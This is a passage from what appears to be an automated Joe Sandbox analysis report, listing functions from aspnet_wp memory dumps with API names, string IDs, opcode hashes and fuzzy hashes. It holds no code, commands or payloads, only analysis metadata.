                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                            • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                                                                                                                            • API String ID: 3215553584-4202648911
                                                                                                                                                                                            • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                                                                            • Instruction ID: 6413fe3b86ea4e8833f82d570c5abb1f9df36577c3998b79bc84583f8a2b81ab
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                                                                            • Instruction Fuzzy Hash: AF61B376E00A4CC2FB659B25E7EC3EA66A0E769F40F50C515C95A037A7DAF4CBC28341
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3CAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                            • Instruction ID: 1a828cddd934cb33f3c0a817913c87c8502ad2eccadb2b10e4cc18f5ea3dccca
                                                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                            • Instruction Fuzzy Hash: 99616B36A10B48CAE710DF65D5943DD77A0F368B88F04C215EF8927B9ADBB8D695C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C39A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3897320165.000002109C390000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002109C390000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c390000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                            • Instruction ID: 35b1188e8e91dfce2b007e1bc4e45343c13f319e1c9dcfa4f9fb0c2a27493d8e
                                                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 38517E36920388CAEB648B1596E839877A0F365F84F18D215DA9987BD7CBF8D7D0C701
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3CAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                            • Instruction ID: 3ab76a9ce4f7d782354b30fe638b845afb16d610363bc242d4d06e47f3048ee6
                                                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 88519E72950388CAEB648B259AE839C77A0F365F85F14C115DEC967B96CBB8C7E0C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C398405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3897320165.000002109C390000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002109C390000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c390000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                                                            • Instruction ID: 628f64eb423d8fc008662cac0fa400421324e52c898e82e553c50239ae7b9236
                                                                                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51B132A01608CBDB54CF15E698B993795F3A4F98F50C224DA464778AEBF4CEC5C705
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3983E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3897320165.000002109C390000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002109C390000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c390000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                                                            • Instruction ID: 63866af5d0540d7372ef969533c98483b773f05a50a1811be43ea13ea00fddb4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E31C132A01644D7E710DF11E9987993764F7A0F88F04C214EE4A07746CBB8CA80CB06
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3D2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                                                            • Instruction ID: b8b70cdbd6d51f6b99f0187d0686b0a65488bf7bb88364dadab43f1f58db5899
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                                                            • Instruction Fuzzy Hash: 94D1E172B04A88C9E711CF66D6A42DC37B1F364B98F00C215CE5A97BDBDA75CA86C340
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3D2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                                                            • Instruction ID: cc9e096f65d64dced0a77c7fcc333678c694c32e9068788e6af39866231280c2
                                                                                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                                                            • Instruction Fuzzy Hash: F8919072E00658C5F7609F6696E83ED2BA0B764F88F14C109DE4B576D7DAB6CAC2C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                                                            • Instruction ID: e5b2fc033c86b6e1ca0cd820dab8d6992ddef54882025a4ba0049c07f53b6509
                                                                                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 80111232B10F05CAEB40CF60E9A83E83374F729B58F448D21DA6D46796DB78C6948380
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileType
                                                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                                                            • Instruction ID: a67ab85e2471a94dacd91bba1975b10bbc18f049d6c566ac9f90305cc27928d1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D71D636A40789C5D764DF269AE83ED6790F3A9F84F44C015DD8A63B8BDEB6C7858300
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C399E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3897320165.000002109C390000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002109C390000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c390000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CallTranslator
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 3163161869-2084237596
                                                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                            • Instruction ID: 32e283a32eb4389ba5d563d5a69952dbfa19361cb403f029f28b874cd54858ca
                                                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D614737A04B88CAEB20DF65D5943DD77A0F368B88F048215EF4917B9ADBB8D695C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileType
                                                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                                                            • Instruction ID: 0f3862f97e731aeec77e6214c76bc4a4d5ba71d43c7a35e1fc285be34e851cab
                                                                                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                                                            • Instruction Fuzzy Hash: DD51EB72944789C2E6649A1AA2FC3EEA651F3A5F40F44C115DDD923B4BCABFC7848740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3D26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                                                            • Instruction ID: 054018f25b24fc4b12a3176e67b007a9fada82195253a346032ca71bf066d334
                                                                                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8041C872B14A84C6DB20DF26E5983D977A0F7A8B94F40C021EE4E87796DBBDC681C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                                                            • Instruction ID: cd637ff332e9cc073388765dcc6e929ece118b29da7eed00e6a844f2d8f8698a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B115B36604B8482EB218B15E59439977E0FB98F94F59C221EECD07769DF7CC691CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C397356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3897320165.000002109C390000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002109C390000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c390000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                                                            • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                                                                                            • API String ID: 592178966-758928094
                                                                                                                                                                                            • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                                                                            • Instruction ID: 39704b5f65b59e29fff5dd0a67d898c4820cfc6a56cd180206a022e7d50d0d39
                                                                                                                                                                                            • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                                                                            • Instruction Fuzzy Hash: 36E08671A40B48D1DF018F21E9942D833A0DBA8F64F48D122995C0A312FA78D2F9C701
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3973B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3897320165.000002109C390000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002109C390000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c390000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                                                            • String ID: Locator'$riptor at (
                                                                                                                                                                                            • API String ID: 592178966-4215709766
                                                                                                                                                                                            • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                                                                            • Instruction ID: c3ac8fb6d991e7831016d7a44b74d1b7cb7c4b4e6dd04c87edbe2cca4e6ca5f9
                                                                                                                                                                                            • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CE08671A00F48D0DF018F21E5901D87360EB68F54F88D122C94C0A312EA78D2E5C300
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 756756679-0
                                                                                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                                                            • Instruction ID: 8ce82ca9cba3d3df50c052c75e203b4770c1d7e0d21f5af025ebaeb154fc196e
                                                                                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 12118235A01B48C1EA04DB66A5982A973A1FB99FC0F18C024DE8E63767DEB8C582D340
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 00007FF7FE54307C Relevance: 61.6, APIs: 27, Strings: 8, Instructions: 321COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000010.00000002.3894045025.00007FF7FE541000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FE540000, based on PE: true
                                                                                                                                                                                            • Associated: 00000010.00000002.3893910529.00007FF7FE540000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894945535.00007FF7FE548000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ff7fe540000_Microsoft.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: memset$Library$CloseHandleInitializeProcesslstrlenwcstoul$AddressAffinityCodeCurrentDirectoryFreeLoadManagedMaskProcSystemVersion__acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                            • String ID: 4.0.30319.0$@$ASP.NETPMEvent_%s_%s_%s_%s$ASP.NETPMEvent_%s_%s_%s_%s_Ping$Bad argument. Exiting.$Incorrect number of arguments. Note: ASP.NET worker process can not be used interactively. Exiting.$\\.\pipe\ASP.NETPMAsyncPipe_%s_%s_%s_%s$\\.\pipe\ASP.NETPMSyncPipe_%s_%s_%s_%s
                                                                                                                                                                                            • API String ID: 939581588-36324950
                                                                                                                                                                                            • Opcode ID: 024289cfcb32005762e038973c92a71c03bfb3cc28b9487307b664669d788a1f
                                                                                                                                                                                            • Instruction ID: fd08fd13148f402d7f45d590bf3f2a8b40c658fa74745bb52f5c2fb77b547231
                                                                                                                                                                                            • Opcode Fuzzy Hash: 024289cfcb32005762e038973c92a71c03bfb3cc28b9487307b664669d788a1f
                                                                                                                                                                                            • Instruction Fuzzy Hash: D9E16F25A0CA4282EB21FB65EC701B9A3A5FFC8744FA05535DA6D437E5EF3CE40587A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FF7FE541E74 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 290timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000010.00000002.3894045025.00007FF7FE541000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FE540000, based on PE: true
                                                                                                                                                                                            • Associated: 00000010.00000002.3893910529.00007FF7FE540000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894945535.00007FF7FE548000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ff7fe540000_Microsoft.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: HandleTrace$DomainEnabledEventFileIndirectInformationRaiseTimememset$AddressCloseCounterCreateCurrentGlobalIncrementModulePerfProcProcessSystem
                                                                                                                                                                                            • String ID: APPL_MD_PATH$APPL_PHYSICAL_PATH
                                                                                                                                                                                            • API String ID: 2775746794-1639331726
                                                                                                                                                                                            • Opcode ID: 0f1f73ce265da230ccab938d4e6599da31f73124823bfae3b09a1a38c0bf4e62
                                                                                                                                                                                            • Instruction ID: 60b1a75d351c3fdb3ccb1334807306f89aa8ca67e6452dc6e6b5e19ed67f7d13
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f1f73ce265da230ccab938d4e6599da31f73124823bfae3b09a1a38c0bf4e62
                                                                                                                                                                                            • Instruction Fuzzy Hash: 49C1C076A0C65286EB11EF51EC706B9E7A4FBC4780FA14032DA6D536D4DF3DE4418BA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FF7FE544AC0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82librarystringloaderCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000010.00000002.3894045025.00007FF7FE541000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FE540000, based on PE: true
                                                                                                                                                                                            • Associated: 00000010.00000002.3893910529.00007FF7FE540000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3894945535.00007FF7FE548000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000010.00000002.3895055541.00007FF7FE54D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ff7fe540000_Microsoft.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Librarylstrlenmemset$AddressDirectoryFreeLoadProcSystemVersion
                                                                                                                                                                                            • String ID: HeapSetInformation$kernel32.dll
